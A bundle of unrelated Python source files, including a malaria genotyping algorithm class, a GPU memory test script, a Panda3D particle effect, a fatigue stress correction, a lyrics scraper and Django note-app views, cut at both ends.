include_package_data=True,
platforms='any',
setup_requires=['flake8'],
install_requires=[
'click==7.0',
],
tests_require=[],
cmdclass={'test': PyTest},
data_files=[],
entry_points={
'console_scripts': [
'omero_user_token = omero_user_token.cli.omero_user_token:main',
]
}
)
|
from math import hypot
co = float(input('Cateto oposto: '))
ca = float(input('Cateto adjasente: '))
print('O cumprimento da hipotenusa é {:.2f}'.format(hypot(co, ca)))
|
import enum
from functools import lru_cache
from typing import List
import numpy as np
import pandas as pd
from api.calculate_frequencies import calculate_frequencies3, Frequencies
class SampleType(enum.Enum):
REINFECTION = 0
RECRUDESCENCE = 1
class HiddenAlleleType(enum.Enum):
MISSING = 1
OBSERVED = 0
UNKNOWN = np.nan # TODO: Confirm this is needed?
class SiteInstanceState:
'''
A class that holds the current state for a single "arm"/site instance when
running the malaria recrudescence algorithm
'''
def __init__(
self,
ids: np.ndarray,
locinames: np.ndarray,
maxMOI: int,
genotypedata_RR: pd.DataFrame,
additional_neutral: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame]):
'''
Sets up the deterministic initial state of the algorithm
TODO: Elaborate, shorten argument list?
'''
self._create_empty_state(ids.size, locinames.size, maxMOI)
self.MOI0, self.MOIf = self._calculate_sample_MOI(
genotypedata_RR, ids, locinames)
self._initialize_alleles(
genotypedata_RR, alleles_definitions_RR, locinames, maxMOI)
self.recoded_additional_neutral = self.recode_additional_neutral(
additional_neutral, alleles_definitions_RR, locinames, maxMOI)
self.dvect = self._get_initial_dvect(alleles_definitions_RR)
self.qq = np.nan
self.dposterior = 0.75 # TODO: What is this?
# TODO: Unsure if these should be here, since they're read-only state?
# estimate frequencies
self.frequencies_RR = calculate_frequencies3(
pd.concat([genotypedata_RR, additional_neutral]),
alleles_definitions_RR)
self.correction_distance_matrix = self._get_correction_distances(
alleles_definitions_RR)
def _create_empty_state(self, num_ids: int, num_loci: int, max_MOI: int):
'''
Creates the initial empty data structures in the state to be populated
later. The data structures are as follows:
alleles0 - Holds the allele fragment lengths found on Day 0
recoded0 - Holds the indices of the bins the allele0 lengths fall into
hidden0 - Records if a given allele was directly observed in the
original dataset (0) or has to be inferred (1) (TODO: What does nan
mean?)
recr0 - Records which strain we think is recrudescing for each sample
(e.g. recr0[i, j] = 2 means "For sample i at locus j, we think the
2nd strain of the locus is the recrudescent one")
*f - All the "f" variants are the same thing, but for the day of failure
mindistance - The closest of all possible allele length pairs for a
given sample/locus
alldistance - All possible allele length pairs for a given sample/locus
allrecrf - Holds all possible allele combinations for the given sample/
locus, and marks which one we estimate is the recrudescent one
classification - Holds whether we think a given sample is a reinfection
or a recrudescence
:param num_ids: The number of samples in the dataset
:param num_loci: The number of loci in the dataset
:param max_MOI: The max multiplicity of infection in the dataset
'''
self.alleles0 = np.zeros((num_ids, max_MOI * num_loci))
self.recoded0 = np.zeros((num_ids, max_MOI * num_loci))
self.hidden0 = np.full_like(np.empty((num_ids, max_MOI * num_loci)),
HiddenAlleleType.UNKNOWN.value)
self.recr0 = np.full_like(np.empty((num_ids, num_loci)), np.nan)
self.allelesf = np.copy(self.alleles0)
self.recodedf = np.copy(self.recoded0)
self.hiddenf = np.copy(self.hidden0)
self.recrf = np.copy(self.recr0)
self.mindistance = np.zeros((num_ids, num_loci))
self.alldistance = np.full_like(np.empty((num_ids, num_loci, max_MOI ** 2)), np.nan)
self.allrecrf = np.full_like(np.empty((num_ids, num_loci, max_MOI ** 2)), np.nan)
self.classification = np.repeat(SampleType.REINFECTION.value, num_ids)
@classmethod
def _calculate_sample_MOI(
cls,
genotypedata_RR: pd.DataFrame,
ids: np.ndarray,
locinames: np.ndarray):
'''
TODO: Verify the details of what this is doing
Calculates the "multiplicity of infections" (MOIs) on day 0 and the day
of failure for each sample in the dataset. Returns these MOIs via 2
arrays
# TODO: Explain what multiplicity of infection actually means
:param genotypedata_RR: The day 0 and day of failure genotype data for
this site's samples
:param ids: The sample ids in the dataset to calculate MOIs for
:locinames: The names of the unique loci in the dataset
:return: A tuple of 1D numpy arrays of length "ids.size", (MOI0, MOIf)
(which contain the multiplicities on the first/last day for each sample,
respectively)
'''
MOI0 = np.repeat(0, ids.size)
MOIf = np.repeat(0, ids.size)
for i, ID in enumerate(ids):
for lociname in locinames:
locicolumns = genotypedata_RR.columns.str.contains(f"{lociname}_")
num_alleles0 = np.count_nonzero(
~genotypedata_RR.loc[
genotypedata_RR["Sample ID"].str.contains(f"{ID} Day 0"), locicolumns
].isna()
)
num_allelesf = np.count_nonzero(
~genotypedata_RR.loc[
genotypedata_RR["Sample ID"].str.contains(f"{ID} Day Failure"),
locicolumns,
].isna()
)
MOI0[i] = np.max([MOI0[i], num_alleles0])
MOIf[i] = np.max([MOIf[i], num_allelesf])
return MOI0, MOIf
def _initialize_alleles(
self,
genotypedata_RR: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locinames: np.ndarray,
max_MOI: int):
'''
TODO: Verify what this actually does?
Initialize the alleles/recoded state, filling them with the appropriate
initial/failure data from the dataframe
:param genotypedata_RR: The day 0 and day of failure genotype data for
this site's samples
:param alleles_definitions_RR: The bins/ranges that the alleles lengths
could fall into
:param locinames: The names of the loci in genotypedata_RR to get
alleles for
:param max_MOI: The maximum multiplicity of infection in the genotype
data
'''
for i, locus in enumerate(locinames):
oldalleles, newalleles = self._get_original_alleles(
genotypedata_RR, alleles_definitions_RR, locus, i)
startColumn = max_MOI * i # NOTE: Subtracted 1 for indexing reasons in Python vs R, but not for endColumn; double-check that's valid
endColumnOldAllele = max_MOI * i + oldalleles.shape[1]
endColumnNewAllele = max_MOI * i + newalleles.shape[1]
self.alleles0[:, startColumn:endColumnOldAllele] = oldalleles[
genotypedata_RR["Sample ID"].str.contains("Day 0"), :
]
self.allelesf[:, startColumn:endColumnOldAllele] = oldalleles[
genotypedata_RR["Sample ID"].str.contains("Day Failure"), :
]
self.recoded0[:, startColumn:endColumnNewAllele] = newalleles[
genotypedata_RR["Sample ID"].str.contains("Day 0"), :
]
self.recodedf[:, startColumn:endColumnNewAllele] = newalleles[
genotypedata_RR["Sample ID"].str.contains("Day Failure"), :
]
@classmethod
def recode_additional_neutral(
cls,
additional_neutral: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locinames: np.ndarray,
max_MOI: int):
'''
TODO: Verify what this actually does?
If additional_neutral data is present, return a recoded version with
the allele lengths appropriately binned; otherwise, returns an empty
numpy array
:param additional_neutral: The background genotype data for this site's
sample data
:param alleles_definitions_RR: TODO:
:param locinames: The names of the loci in additional_neutral to get
alleles for
:param max_MOI: The maximum multiplicity of infection in the additional
data
:return: The recoded additional_neutral array, or an empty numpy array
if there is no additional_neutral data
'''
if additional_neutral.size == 0 or additional_neutral.shape[0] == 0:
return np.empty([0,0])
recoded_additional_neutral = np.zeros((additional_neutral.shape[0], max_MOI * locinames.size))
for i, locus in enumerate(locinames):
oldalleles, newalleles = cls._get_original_alleles(
additional_neutral, alleles_definitions_RR, locus, i)
# TODO: Same indexing as for _initializing_alleles?
startColumn = max_MOI * i
endColumn = startColumn + oldalleles.shape[1]
recoded_additional_neutral[:, startColumn:endColumn] = newalleles
return recoded_additional_neutral
@classmethod
def _get_original_alleles(
cls,
samples_df: pd.DataFrame,
alleles_definitions_RR: List[pd.DataFrame],
locus: str,
locus_index: int):
'''
TODO: Verify what this actually does?
Return the oldalleles/newalleles from the given dataframe, with NaN
values set to 0
:param samples_df: The dataframe containing the samples
:param alleles_definitions_RR:
:param locus: The locus in the dataframe to get alleles for
:param locus_index: The index of the locus among the unique locinames in
the dataframe
:return: A tuple of 2 numpy arrays: (oldalleles, newalleles)
'''
locicolumns = samples_df.columns.str.contains(f"{locus}_")
oldalleles = samples_df.loc[:, locicolumns].to_numpy()
newalleles = np.copy(oldalleles)
num_columns = oldalleles.shape[1]
for j in range(num_columns):
newalleles[:, j] = np.array(list(map(
lambda x: cls._recode_allele(
alleles_definitions_RR[locus_index].to_numpy(),
oldalleles[x, j]),
range(0, oldalleles.shape[0])
)))
# Set all nans in either array to 0
oldalleles[np.isnan(oldalleles)] = 0
oldalleles[np.isnan(newalleles)] = 0
newalleles[np.isnan(newalleles)] = 0
return oldalleles, newalleles
@classmethod
def _recode_allele(
cls,
alleles_definitions_subset: np.ndarray,
proposed: float):
'''
Returns the index of the alleles_definitions bin that the proposed
allele length falls into, or np.nan if it doesn't fall within any
of the subset's ranges
:param alleles_definitions_subset: Nx2 2D numpy array, representing
(mutually exclusive) ranges of allele lengths the proposed value can
fall between
:param proposed: Value that should fall between one of the ranges in the
subset
:return: Returns a single integer index of the row/range the proposed
number falls within in the subset, or np.nan if no valid range was
found
'''
# verify shapes.
if len(alleles_definitions_subset.shape) != 2 or alleles_definitions_subset.shape[1] != 2:
raise ValueError(f'Improper alleles_definition_subset shape {alleles_definitions_subset.shape} (expected (:,2))')
# alleles_definitions_subset ranges guaranteed to be non-overlapping, so it will always fall within either 0 or exactly 1 of the ranges (i.e. rows)
result = np.argwhere(np.logical_and(proposed > alleles_definitions_subset[:, 0], proposed <= alleles_definitions_subset[:, 1]))
result = result.reshape(-1)
if (result.size == 0):
result = np.nan
else:
return result[0]
return result
@classmethod
def _get_initial_dvect(cls, alleles_definitions_RR: pd.DataFrame):
'''
TODO: Understand this better?
Return the initial distance vector (estimating the likelihood of error
in the analysis)
'''
ranges = []
for dataframe in alleles_definitions_RR:
# Get the range (max-min) of the first "nloci" dataframes, then the max of all those
ranges.append(dataframe.max().max() - dataframe.min().min())
dvect = np.zeros(1 + int(round(max(ranges))))
dvect[0] = 0.75
dvect[1] = 0.2
dvect[2] = 0.05
return dvect
@classmethod
def _get_correction_distances(
cls,
alleles_definitions_RR: List[pd.DataFrame]) -> List[np.ndarray]:
'''
TODO: Verify this description
Returns the matrix of distances between each pair of alleles, for each
locus
:param alleles_definitions_RR: TODO:
:return: Python array of 2D matrices of distances between each allele
pair for a given locus
'''
correction_distance_matrix = [] # for each locus, matrix of distances between each allele
# TODO: Vectorize this (it seems fairly doable)
for i in range(len(alleles_definitions_RR)):
# Wrap mean call in "array" so we get a 2D array we can transpose (getting us a grid of distances, not just a 1D vector)
distances = np.array([np.mean(alleles_definitions_RR[i], axis=1)])
distance_combinations = np.abs(distances.T - distances)
correction_distance_matrix.append(distance_combinations)
return correction_distance_matrix
def randomize_initial_assignments(
self,
num_ids: int,
num_loci: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
seed: int = None):
'''
TODO: Elaborate
Assign random initial values for the hidden alleles and
reinfection/recrudescence classifications, based on the prior calculated
frequencies for the malaria dataset
'''
random = np.random.RandomState(seed)
for id_index in range(num_ids):
# 50% chance if this sample should be initialized as a reinfection
# or recrudescence
if random.uniform(size=1):
self.classification[id_index] = SampleType.RECRUDESCENCE.value
for locus_index in range(num_loci):
self._randomize_hidden_alleles(
id_index,
locus_index,
max_MOI,
alleles_definitions_RR,
random)
self._assign_closest_recrudescences(id_index, locus_index, max_MOI)
self.qq = self._get_initial_qq(self.hidden0, self.hiddenf)
def _randomize_hidden_alleles(
self,
id_index: int,
locus_index: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
rand: np.random.RandomState):
'''
TODO: Elaborate
Randomizes the initial allele values for the given ID/locus
:param id_index: The index of the current ID to set alleles for
:param locus_index: The index of the current locus to set alleles for
:param max_MOI: The maximum multiplicity of infection in the dataset
:param alleles_definitions_RR:
:param rand: A generator for the random numbers in this function
'''
self._randomize_allele_group(
self.alleles0, self.recoded0, self.hidden0, self.MOI0,
id_index, locus_index, max_MOI, alleles_definitions_RR, rand)
self._randomize_allele_group(
self.allelesf, self.recodedf, self.hiddenf, self.MOIf,
id_index, locus_index, max_MOI, alleles_definitions_RR, rand)
def _randomize_allele_group(
self,
alleles: np.ndarray,
recoded: np.ndarray,
hidden: np.ndarray,
MOIs: np.ndarray,
id_index: int,
locus_index: int,
max_MOI: int,
alleles_definitions_RR: List[pd.DataFrame],
rand: np.random.RandomState):
'''
TODO: Cut down on the parameter list (combine last few elements in
tuple?)
NOTE: Depends on assuming alleles, recoded, and hidden will be modified
in-place (i.e. that they're passed by reference)
'''
i = id_index
j = locus_index
# TODO: Start/end of what? The portion of the row w/ this locus information?
start = max_MOI * j
end = max_MOI * (j + 1)
# Find all the non-zero length alleles (meaning we've observed them)
num_alleles = np.count_nonzero(alleles[i, start:end])
num_missing = MOIs[i] - num_alleles
# TODO: Eliminate code duplication if possible?
missing_alleles_indices = np.arange(start, end)[
np.where(alleles[i, start: start + MOIs[i]] == 0)
]
present_alleles_indices = np.arange(start, end)[
np.where(alleles[i, start: start + MOIs[i]] != 0)
]
# Sample to randomly initialize the missing alleles/hidden variables
# (no need to sample for observed alleles w/ known lengths)
if num_alleles > 0:
hidden[i, present_alleles_indices] = HiddenAlleleType.OBSERVED.value
if num_missing == 0:
return
new_hidden_alleles = rand.choice(
# Select from first row (count of how many probabilities they are)
np.arange(0, int(self.frequencies_RR.lengths[j])),
size=num_missing,
replace=True,
p=self.frequencies_RR.matrix[j, 0: int(self.frequencies_RR.lengths[j])]
)
# Choose random initial data for missing alleles
recoded[i, missing_alleles_indices] = new_hidden_alleles
# calculate row means (mean allele lengths)
alleles[i, missing_alleles_indices] = np.mean(alleles_definitions_RR[j], axis=1)[new_hidden_alleles]
hidden[i, missing_alleles_indices] = HiddenAlleleType.MISSING.value
# TODO: Find some way to set the cache size = to number of samples?
@lru_cache(maxsize=128)
def get_all_possible_recrud(self, sample_id: int) -> np.ndarray:
'''
Returns all possible pairs of alleles that could be recrudescing for
this sample
'''
return np.stack(
np.meshgrid(np.arange(self.MOI0[sample_id]), np.arange(self.MOIf[sample_id]))
).T.reshape(-1, 2)
def _assign_closest_recrudescences(
self,
id_index: int,
locus_index: int,
max_MOI: int):
'''
Finds the closest possible recrudescing allele pairs known for each
locus and sample ID, records them as our initial guess for the
recrudescence, and updates the variables appropriately.
The closest allele pair is assigned as our initial guess for the most
likely allele to be recrudescent with the sample's day 0 allele.
:param id_index: The index of the sample ID being evaluated
:param locus_index: The index of the locus being evaluated
:max_MOI: The maximum multiplicity of infection for the dataset
'''
i = id_index
j = locus_index
# calculate all possible pairs of alleles that could be recrudescing for
# this sample
# NOTE: Correct indices generated, but in a different order than R code
allpossiblerecrud = self.get_all_possible_recrud(i)
# TODO: Much of the below code near-duplicated?
allele0_col_indices = max_MOI * j + allpossiblerecrud[:, 0]
allelef_col_indices = max_MOI * j + allpossiblerecrud[:, 1]
# calculate distances between each possible pair of alleles
recrud_distances = np.abs(
self.alleles0[i, allele0_col_indices] - self.allelesf[i, allelef_col_indices]
)
# select the closest pair, and record the closest distance/distances for
# this sample
closest_recrud_index = np.argmin(recrud_distances)
self.mindistance[i, j] = recrud_distances[closest_recrud_index]
self.alldistance[i, j, :recrud_distances.size] = recrud_distances
self.allrecrf[i, j, :allpossiblerecrud.shape[0]] = self.recodedf[
i, max_MOI * j + allpossiblerecrud[:, 1]
]
def set_recrudescences(recr, is_day_0=True):
# TODO: Verify what the purpose of this actually is?
recrud_column = 0 if is_day_0 else 1
recr[i, j] = max_MOI * j + allpossiblerecrud[closest_recrud_index, recrud_column]
set_recrudescences(self.recr0)
set_recrudescences(self.recrf, False)
@classmethod
def _get_initial_qq(cls, hidden0: np.ndarray, hiddenf: np.ndarray):
'''
Initial estimate of q, the probability of an allele being "missing" in
the dataset (as opposed to observed directly)
:param hidden0: An array listing whether each allele for a given sample/
locus has been directly observed or is missing/estimated on Day 0
:param hiddenf: Similar to hidden 0, but whether each allele has been
directly observed or is missing on the Day of Failure for a sample
:return: A single number q, the mean of the known hidden variables
'''
return np.nanmean(np.concatenate([hidden0, hiddenf]))
|
import numpy as np
import torch
from pynvml import *
nvmlInit()
from algorithms.gcn_algo import GCN
device = torch.device('cuda:0')
print("*********** 0 ***********")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
#print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
#print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** 0 ***********")
ts = list()
for i in range(100):
a_cpu = torch.ones((26843540,), dtype=torch.float32)
a_gpu = a_cpu.to(device)
ts.append(a_gpu)
print("********** {} ************".format(i))
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** {} ***********".format(i))
if i % 10 == 0:
input()
del ts[:50]
print("********** del half before empty ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** del half before empty ***********")
input()
"""
torch.cuda.empty_cache()
print("********** del half after empty ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** del half after empty ***********")
input()
"""
estimate_available = info.free + (torch.cuda.memory_cached(0) - torch.cuda.memory_allocated(0))
print(estimate_available)
a_cpu = torch.ones((int((0.9*estimate_available)/4),), dtype=torch.float32)
a_gpu = a_cpu.to(device)
print("********** success or fail ************")
#print(torch.cuda.get_device_properties(0).total_memory)
#print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_cached(0))
print(torch.cuda.max_memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(torch.cuda.max_memory_allocated(0))
print("**********************")
h = nvmlDeviceGetHandleByIndex(0)
info = nvmlDeviceGetMemoryInfo(h)
print(f'total : {info.total}')
print(f'free : {info.free}')
print(f'used : {info.used}')
print("*********** success or fail ***********")
input()
"""
a = GCN(2, 123)
b = list(a.parameters())
num_floats = 0
for param in b:
print(param.size())
tmp = np.prod(param.size())
num_floats += tmp
print(tmp)
print(num_floats)
mye = GCN.estimate_mem_consumption(10000, 600000, 2, 123)
print(torch.cuda.get_device_properties(0).total_memory)
print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(mye)
"""
|
# File: F (Python 2.4)
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.actor import Actor
from direct.particles import ParticleEffect
from direct.particles import Particles
from direct.particles import ForceGroup
from otp.otpbase import OTPRender
from PooledEffect import PooledEffect
from EffectController import EffectController
import random
class FlamingSkull(PooledEffect, EffectController):
cardScale = 128.0
def __init__(self):
PooledEffect.__init__(self)
EffectController.__init__(self)
model = loader.loadModel('models/effects/particleMaps')
self.card = model.find('**/particleFire')
if not FlamingSkull.particleDummy:
FlamingSkull.particleDummy = render.attachNewNode(ModelNode('FlamingSkullParticleDummy'))
FlamingSkull.particleDummy.setDepthWrite(0)
FlamingSkull.particleDummy.setFogOff()
FlamingSkull.particleDummy.setLightOff()
FlamingSkull.particleDummy.setColorScaleOff()
FlamingSkull.particleDummy.setTwoSided(1)
FlamingSkull.particleDummy.setBin('fixed', 60)
FlamingSkull.particleDummy.hide(OTPRender.ShadowCameraBitmask)
self.icon = loader.loadModel('models/effects/skull')
self.icon.setBillboardAxis(0.0)
self.icon.setDepthWrite(0)
self.icon.setFogOff()
self.icon.setLightOff()
self.icon.setColorScaleOff()
self.icon.reparentTo(self)
self.icon.setPos(self, 0, 0, -0.29999999999999999)
self.icon.setBin('fixed', 65)
self.icon.hide(OTPRender.ShadowCameraBitmask)
self.f = ParticleEffect.ParticleEffect('FlamingSkull')
self.f.reparentTo(self)
self.p0 = Particles.Particles('particles-1')
self.p0.setFactory('ZSpinParticleFactory')
self.p0.setRenderer('SpriteParticleRenderer')
self.p0.setEmitter('SphereSurfaceEmitter')
self.f.addParticles(self.p0)
self.p0.setPoolSize(128)
self.p0.setBirthRate(0.20000000000000001)
self.p0.setLitterSize(1)
self.p0.setLitterSpread(0)
self.p0.setSystemLifespan(0.0)
self.p0.setLocalVelocityFlag(1)
self.p0.setSystemGrowsOlderFlag(0)
self.p0.factory.setLifespanBase(1.2)
self.p0.factory.setLifespanSpread(0.5)
self.p0.factory.setMassBase(1.0)
self.p0.factory.setMassSpread(0.20000000000000001)
self.p0.factory.setTerminalVelocityBase(400.0)
self.p0.factory.setTerminalVelocitySpread(0.0)
self.p0.factory.setInitialAngle(0.0)
self.p0.factory.setInitialAngleSpread(20.0)
self.p0.factory.enableAngularVelocity(1)
self.p0.factory.setAngularVelocity(0.0)
self.p0.factory.setAngularVelocitySpread(0.0)
self.p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
self.p0.renderer.setUserAlpha(1.0)
self.p0.renderer.setFromNode(self.card)
self.p0.renderer.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.p0.renderer.setXScaleFlag(1)
self.p0.renderer.setYScaleFlag(1)
self.p0.renderer.setAnimAngleFlag(1)
self.p0.renderer.setInitialXScale(0.0018 * self.cardScale)
self.p0.renderer.setInitialYScale(0.0018 * self.cardScale)
self.p0.renderer.setFinalXScale(0.0001 * self.cardScale)
self.p0.renderer.setFinalYScale(0.0001 * self.cardScale)
self.p0.renderer.setNonanimatedTheta(0.0)
self.p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
self.p0.renderer.setAlphaDisable(0)
self.p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd, ColorBlendAttrib.OOneMinusFbufferAlpha, ColorBlendAttrib.OOneMinusIncomingAlpha)
self.p0.renderer.getColorInterpolationManager().addLinear(0.0, 1.0, Vec4(1.0, 1.0, 1.0, 1.0), Vec4(0, 0, 0, 1.0), 1)
self.p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
self.p0.emitter.setAmplitude(-0.75)
self.p0.emitter.setAmplitudeSpread(0.5)
self.p0.emitter.setOffsetForce(Vec3(0.0, 0.0, 4.0))
self.p0.emitter.setExplicitLaunchVector(Vec3(1.0, 0.0, 0.0))
self.p0.emitter.setRadiateOrigin(Point3(0.0, 0.0, 0.0))
self.p0.emitter.setRadius(0.5)
def createTrack(self):
self.p0.renderer.setInitialXScale(0.01 * self.cardScale)
self.p0.renderer.setInitialYScale(0.01 * self.cardScale)
self.icon.show()
self.icon.setColorScale(0, 0, 0, 0)
self.icon.setScale(1.0)
skullFadeIn = self.icon.colorScaleInterval(3.0, Vec4(0.10000000000000001, 0.10000000000000001, 0, 0.25), startColorScale = Vec4(0, 0, 0, 0))
skullFadeOut = self.icon.colorScaleInterval(1.0, Vec4(0, 0, 0, 0), startColorScale = Vec4(0.10000000000000001, 0.10000000000000001, 0, 0.25))
skullPulseUp = self.icon.scaleInterval(0.050000000000000003, 1.25, startScale = 1.0)
skullPulseDown = self.icon.scaleInterval(0.050000000000000003, 1.0, startScale = 1.25)
skullPulse = Sequence(skullPulseUp, skullPulseDown)
skullColorPulseUp = self.icon.colorScaleInterval(0.10000000000000001, Vec4(0.10000000000000001, 0.10000000000000001, 0, 0.5), startColorScale = Vec4(0, 0, 0, 0.25))
skullColorPulseDown = self.icon.colorScaleInterval(0.10000000000000001, Vec4(0, 0, 0, 0.25), startColorScale = Vec4(0.10000000000000001, 0.10000000000000001, 0, 0.5))
skullColorPulse = Sequence(skullColorPulseUp, skullColorPulseDown)
growSize = LerpFunctionInterval(self.setNewSize, 3.0, toData = 1.0, fromData = 0.001)
self.startEffect = Sequence(Func(self.p0.setBirthRate, 0.01), Func(self.p0.clearToInitial), Func(self.f.start, self, self.particleDummy), Func(self.f.reparentTo, self), Func(skullFadeIn.start), Func(skullPulse.loop), growSize, Func(skullColorPulse.loop))
self.endEffect = Sequence(Func(self.p0.setBirthRate, 100.0), Sequence(skullFadeOut, Func(skullPulse.finish), Func(skullColorPulse.finish), Func(self.icon.hide)), Wait(1.0), Func(self.cleanUpEffect))
self.track = Parallel(self.startEffect, Wait(5.0), self.endEffect)
def setNewSize(self, time):
if self.p0:
self.p0.emitter.setAmplitude(-2.0 * time)
self.p0.renderer.setFinalXScale(0.001 * time * self.cardScale)
self.p0.renderer.setFinalYScale(0.001 * time * self.cardScale)
self.p0.renderer.setUserAlpha(min(0.5 * time * 3, 0.5))
def playLaunch(self, time, targetPos):
if self.p0:
throwTrack = LerpPosInterval(self, time, targetPos)
self.fireTrack = Sequence(throwTrack, Func(self.stopLoop))
self.fireTrack.start()
def cleanUpEffect(self):
EffectController.cleanUpEffect(self)
self.checkInEffect(self)
def destroy(self):
EffectController.destroy(self)
PooledEffect.destroy(self)
|
#!/usr/bin/env python
# coding: utf-8
"""
Fatigue related corrections.
"""
import numpy as np
def goodman_haigh(cycles, uts):
"""
Effective alternating stress using the Goodman-Haigh mean stress correction for fully reversed loading (R=-1).
Parameters
----------
cycles : list
Pairs of cycle range and mean
uts : float
Material ultimate tensile strength
Returns
-------
list
Corrected stress ranges
Notes
-----
In materials science and fatigue, the Goodman relation is an equation used to quantify the interaction of mean and
alternating stresses on the fatigue life of a material.
A Goodman diagram,[1][2] sometimes called a Haigh diagram or a Haigh-Soderberg diagram,[3] is a graph of (linear)
mean stress vs. (linear) alternating stress, showing when the material fails at some given number of cycles.
A scatterplot of experimental data shown on such a plot can often be approximated by a parabola known as the Gerber
line, which can in turn be (conservatively) approximated by a straight line called the Goodman line.
Correcting the stress ranges like this can only be applied with an SN-curve with a stress ratio (R) of -1.
References
----------
1. Herbert J. Sutherland and John F. Mandell. "Optimized Goodman diagram for the analysis of fiberglass composites
used in wind turbine blades"
2. David Roylance. "Fatigue", Archived 2011-06-29 at the Wayback Machine.. 2001
3. Tapany Udomphol. "Fatigue of metals". 2007.
"""
ranges, means = zip(*cycles)
# calculate effective alternating stress
corrected_ranges = np.array(ranges) * (uts / (uts - np.array(means)))
return list(corrected_ranges)
|
import json
import lyricwikia
import random
# https://github.com/enricobacis/lyricwikia
thisLineJSON = {}
with open('topSongsJSONTimeout.txt','r') as f, open('lyricData.txt','w',errors='replace') as g:
for x in f:
x = x.rstrip()
if not x: continue
jsonLoader = json.loads(x)
if 'tracks' in jsonLoader:
for thisElement in jsonLoader['tracks']:
thisLineJSON['songName'] = thisElement['name']
thisLineJSON['songID'] = thisElement['id']
thisLineJSON['duration'] = thisElement['duration_ms']
for thisArtist in thisElement['album']['artists']:
artistName = thisArtist['name']
songName = thisElement['name']
try:
lyrics = lyricwikia.get_lyrics(artistName,songName,linesep='\n',timeout=None)
except:
print('lyric error: not found for ' + songName + ' by ' + artistName)
lyrics = ""
thisLineJSON['lyrics'] = lyrics
thisLineJSON['artistName'] = thisArtist['name']
thisLineJSON['artistID'] = thisArtist['id']
g.write(json.dumps(thisLineJSON))
g.write('\n')
|
import json
import os
def gerrit_project_map():
# Used for mapping gerrit project names onto OBS package names
map_file = os.path.join(os.path.dirname(__file__), 'project-map.json')
with open(map_file) as map:
project_map = json.load(map)
return project_map
|
from django.shortcuts import render, redirect
from notes.app.forms import ProfileForm, NoteForm, NoteDeleteForm
from notes.app.models import Profile, Note
def home(request):
if request.method == 'GET':
profile = Profile.objects.first()
if not profile:
form = ProfileForm()
return render(request, 'home-no-profile.html', {'form': form})
else:
notes = Note.objects.all()
return render(request, 'home-with-profile.html', {'notes': notes})
else:
form = ProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'home-no-profile.html', {'form': form})
def add_note(request):
if request.method == 'GET':
form = NoteForm()
return render(request, 'note-create.html', {'form': form})
else:
form = NoteForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-create.html', {'form': form})
def edit_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteForm(instance=note)
return render(request, 'note-edit.html', {'form': form})
else:
form = NoteForm(request.POST, instance=note)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-edit.html', {'form': form})
def delete_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteDeleteForm(instance=note)
return render(request, 'note-delete.html', {'form': form})
else:
note.delete()
return redirect('home')
def note_details(request, pk):
note = Note.objects.get(pk=pk)
return render(request, 'note-details.html', {'note': note})
def profile_details(request):
profile = Profile.objects.first()
notes = Note.objects.all()
return render(request, 'profile.html', {'profile': profile, 'notes': notes.count()})
def delete_profile(request):
profile = Profile.objects.first()
notes = Note.objects.all()
profile.delete()
notes.delete()
return redirect('home')
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
import tensorflow as tf
